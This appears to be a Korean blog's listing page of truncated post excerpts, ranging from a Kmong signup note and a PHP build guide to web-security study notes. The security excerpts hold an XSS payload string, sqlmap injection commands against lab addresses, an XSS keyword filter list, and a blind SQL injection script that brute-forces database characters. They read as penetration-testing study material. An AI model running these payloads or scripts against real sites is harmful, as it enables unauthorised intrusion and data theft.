크몽 판매자 등록을 하기위하여 전문가 인증을 해야한다. kmong.com/my_profile/certification : 홈 > 계정 설정 > 인증 정보 프리랜서마켓 No.1 크몽 | 디자인, IT·프로그래밍, 마케팅,번역·통역, 경영진단, 법률 및 취업 관 블로그·카페, 로고·브랜딩, 웹사이트 개발 등 15만명+의 전문가 중에서 나만을 위한 전문가를 리뷰, 포트폴리오, 실시간 견적과 함께 크몽에서 만나보세요 kmong.com

import imagesearch import pyautogui as pag # 변수초기화 found_img = 0 # mouse position # while True: # print(pag.position()) # mouseX = input("마우스 x 좌표 입력") # mouseY = input("마우스 y 좌표 입력") # 프로그램시작 while True: print("Start seeking..") p_list = pag.locateAllOnScreen("./image1.png") p_list = list(p_list) print(p_list) if len(p_list) == 0 : # 전체 화면상에서 찾는 이미지가 없는 경우 print("이미지 없음") else: print("이미지 찾음") ..

">asdf">/>"/>">asdfasdf">aaaaasdfasd"+onfocus="alert(/xss/)"+autofocus=     -->

기호 ● ∪ : 또는 ● ∩ : 그리고 ● ~ : 역 전제 ● Request 패킷의 파라미터가 Response 패킷에서 사용되어야한다. ● 특수문자는 ', ", /, ;, 등을 뜻한다. ● 키워드는 onerror, alert, prompt 등을 뜻한다. 명제 ● (특수문자 허용 ∩ 키워드 허용) -> 취약 ● ~취약 -> ~(특수문자 허용 ∩ 키워드 허용) ● ~취약 -> ~특수문자 허용 ∪ ~키워드 허용 설명 ● 특수문자를 허용하고 키워드를 허용하면 취약하다. ● 취약하지 않다는 특수문자 및 키워드를 허용하지 않으면 된다. ● 취약하지 않다는 특수문자를 허용하지 않거나 키워드를 허용하지 않으면 된다.

mylanviewer(네트워크 자산 스케너) 유튜브(www.youtube.com/results?search_query=mylanviewer)

1. php 다운로드 wget https://museum.php.net/php5/php-5.3.5.tar.bz2 2. 압축해제 tar zxf php-5.3.5.tar.gz 3. 폴더이동 cd php-5.3.5 4. 패키지 설치 sudo apt-get install flex sudo apt-get install libxml2-dev 5. 패치파일 다운로드(오류 해결 필수) wget mail.gnome.org/archives/xml/2012-August/txtbgxGXAvz4N.txt 6. 패치파일 설치 patch -p0 < ./txtbgxGXAvz4N.txt 7. 배치파일 실행 ./configure 8. 컴파일 및 설치 make sudo make install #패치파일 내용 --- ext/dom/node..

brunch.co.kr/@sshong/323 난 완벽주의자라 뭐 하나 제대로 완성을 못하겠어 당근메일 뉴스레터 #7 | 정기적으로 당근메일 뉴스레터를 제공합니다 난 완벽주의자라 뭐 하나 제대로 완성을 못하겠어 라는 내용으로 트위터 인레님이 작성한 것으로 영상제작합니다 ‘난 완 brunch.co.kr

일반적 sqlmap 분석순서 1. SQL Injection 판별 2. 데이터베이스 목록 조회 3. 테이블 목록 조회 4. 테이블 스키마 조회 5. 테이블 내용 덤프(조회) 6. 기타 등등… 1. SQL Injection 판별 http://192.168.23.131/cat.php?id=1 취약 인지 2-1. 데이터베이스 목록 조회(DBMS 정보를 알고있는 경우 다음과 같이 명령어를 입력) GET sqlmap -u "http://192.168.23.131/cat.php?id=1" --dbms=mysql POST [특정 파라미터 검색] sqlmap -u "http://192.168.206.131/admin/index.php" --data "id=1&password=aaaa" -p id [파라미터 검색] sql..

1. 파라미터에 값에 대하여 특수문자(,',")가 입력될 경우 스크립트가 실행되지 않도록 서버에서 html entity문자(, &#x27;, ")등으로 필터링 처리 2. 다음 특수문자, 특수구문 필터링 규칙 적용 frameset oncut void applet eval onstop cookie style document onclick onactivate layer javascript onbeforecut onkeyup onkeydown onfocusin onselectstart onload script link xml create object embed msgbox binding ondeactivate onerror ondragstart ondragleave ondragend onbounce..

import requests #substr, ascii 사용가능 #db_name()을 사용한다고 가정 #ascii 33~116 #상수 선언 asciiNo = 33 keyword = '!!!' answer = ['결과',] for asciiNo in range(33, 123): paramNo = '28335+and+ascii(substr(11111,1,1))>='+str(asciiNo) URL = 'https://XXX/_prog/gard/board.php?code=notice&GotoPage=1&no='+paramNo+' response = requests.get(URL) print(paramNo) if keyword in response.text: print('문자' + chr(asciiNo) + '입..